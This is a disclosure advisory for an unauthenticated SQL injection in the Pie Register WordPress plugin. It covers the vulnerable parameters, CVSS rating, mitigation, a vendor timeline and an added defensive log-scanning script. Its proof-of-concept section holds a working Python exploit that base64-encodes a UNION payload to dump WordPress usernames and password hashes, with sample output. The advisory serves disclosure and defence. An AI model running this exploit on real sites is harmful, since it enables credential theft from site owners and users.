Pie Register 2.0.14-2.0.15, SQL Injection

User input is not validated correctly when an Invitation Code is accepted, so an SQL injection attack is possible. The attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ are supplied to any page, by any user (anonymous or otherwise). The value of the ‘invitaion_code’ parameter is decoded as Base64 and then inserted directly into the query without a prepared statement, so it is possible to append a UNION to the query, as shown in the PoC below.
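As an added, defender-side example (not part of this advisory or of the plugin), the following Python 3 script scans constructed web-server access-log lines for the request pattern described above: requests carrying both ‘show_dash_widget’ and ‘invitaion_code’, whose Base64-decoded code contains SQL metacharacters. The log lines, client IPs and function names are assumptions made for the example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the advisory). The second
# request carries a base64-encoded UNION payload in the misspelled
# 'invitaion_code' parameter; the first carries an ordinary code.
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2015:10:00:01 +0000] "GET /?show_dash_widget=1&invitaion_code=QUJDMTIz HTTP/1.1" 200 512
10.0.0.9 - - [04/May/2015:10:00:07 +0000] "GET /?show_dash_widget=1&invitaion_code=JykgVU5JT04gU0VMRUNUIDEsMiM%3D HTTP/1.1" 200 4096
10.0.0.7 - - [04/May/2015:10:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Tokens a payload needs to break out of the quoted value or alter the query.
SQLI_RE = re.compile(r"(?i)(\bUNION\b|\bSELECT\b|['\"()]|#|--)")


def decode_invitation_code(value):
    """Return the base64-decoded code as text, or None if it is not valid base64."""
    # parse_qs turns '+' into ' '; base64 never contains spaces, so restore it.
    value = value.replace(" ", "+")
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect_request(path):
    """Classify one request path; returns (suspicious, decoded_code)."""
    params = parse_qs(urlsplit(path).query)
    if "show_dash_widget" not in params or "invitaion_code" not in params:
        return False, None
    decoded = decode_invitation_code(params["invitaion_code"][0])
    if decoded is None:
        return False, None
    return bool(SQLI_RE.search(decoded)), decoded


def find_sqli_attempts(log_text):
    """Return [(client_ip, decoded_code)] for requests whose code looks like SQL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        suspicious, decoded = inspect_request(m.group(1))
        if suspicious:
            hits.append((line.split()[0], decoded))
    return hits
```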

Homepage

https://wordpress.org/plugins/pie-register/

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Uninstall the plugin – or patch manually

Proof of Concept

The PoC below outputs a list of usernames and hashed passwords from the current database.

import requests,base64,re

url="http://localhost"
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query)
params = {
        "show_dash_widget":1,
        "invitaion_code":query_encoded
}
r = requests.get(url, params=params)

print re.search(r"<tr><td>([^<]*?)<", r.text).group(1)

Output

~$ python g0blin-00040.py
test,$P$BlI29cUx2Z0Wpt0DHALldoY.CCGrha0

Timeline

  • 2015-03-16: Discovered
  • 2015-03-16: Vendor notified
  • 2015-03-17: Vendor responded – already fixed in a pending 2.0.15 release – stated would allow for review prior to release
  • 2015-03-24: Vendor responded – stated new version in testing – will be released mid April
  • 2015-04-13: Update requested from Vendor
  • 2015-04-20: Update requested from Vendor
  • 2015-04-20: Vendor states new version
  • 2015-04-29: Update requested from Vendor – stated reports to be released on Monday due to lack of communication
  • 2015-04-30: Version 2.0.15 released – issue still present – no chance for review given
  • 2015-05-04: Advisory released